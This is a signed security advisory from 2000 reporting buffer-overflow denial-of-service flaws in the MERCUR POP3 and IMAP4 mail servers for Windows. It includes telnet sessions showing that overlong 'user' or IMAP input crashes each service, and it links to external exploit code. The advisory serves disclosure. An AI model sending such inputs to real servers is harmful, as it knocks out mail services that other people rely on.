USSR Advisory #35 - Remote / local dos overflow attack in MERCUR v3.2* Mail server, pop server, and imap server for Windows.
bc50ab174effe6cc371148796eba9cfd01035cb4c4caf8c073146c2acef6a2f4
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Local / Remote Multiples DoS Attacks in MERCUR v3.2* for Windows
98/NT Vulnerability
USSR Advisory Code: USSR-2000035
Release Date:
March 15, 2000
Systems Affected:
MERCUR Mailserver 3.2
MERCUR POP3-Server (v3.20.01) for Windows 98/NT
MERCUR IMAP4-Server (v3.20.01) for Windows 98/NT
THE PROBLEM
UssrLabs found multiple places in MERCUR v3.20.* where they do not
use proper bounds checking.
The following all result in a Denial of Service against the service
in question.
Example:
[hellme@die-communitech.net$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT ready
at Tue, 14 M
ar 2000 03:30:39 -0300
user (buffer)
Where [buffer] is aprox. 2000 characters.
[hellme@die-communitech.net$ telnet example.com 143
Trying example.com...
Connected to example.com.
Escape character is '^]'.
* OK MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT ready
at Tue, 14
Mar 2000 03:34:09 -0300
(buffer)
Where [buffer] is aprox. 3000 characters.
Binary or source for this Exploit:
http://www.ussrback.com/
Exploit:
the Exploit, crash the remote machine service pop3 and imap
Vendor Status:
informed
Vendor Url: http://www.atrium-software.com
Program Url: http://www.atrium-software.com/mercur/mercur_e.html
Credit: USSRLABS
SOLUTION
Noting yet.
Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, HNN, Technotronic and
Wiretrip.
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c
h
http://www.ussrback.com
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>
iQA/AwUBONAIJ6VRYEYcg938EQL/AgCg39j7B6rQSXUNK/MQkxlDEmg6WCQAnRey
+gdnd/4H3zK18gDRuZ/TlrzV
=UYs9
-----END PGP SIGNATURE-----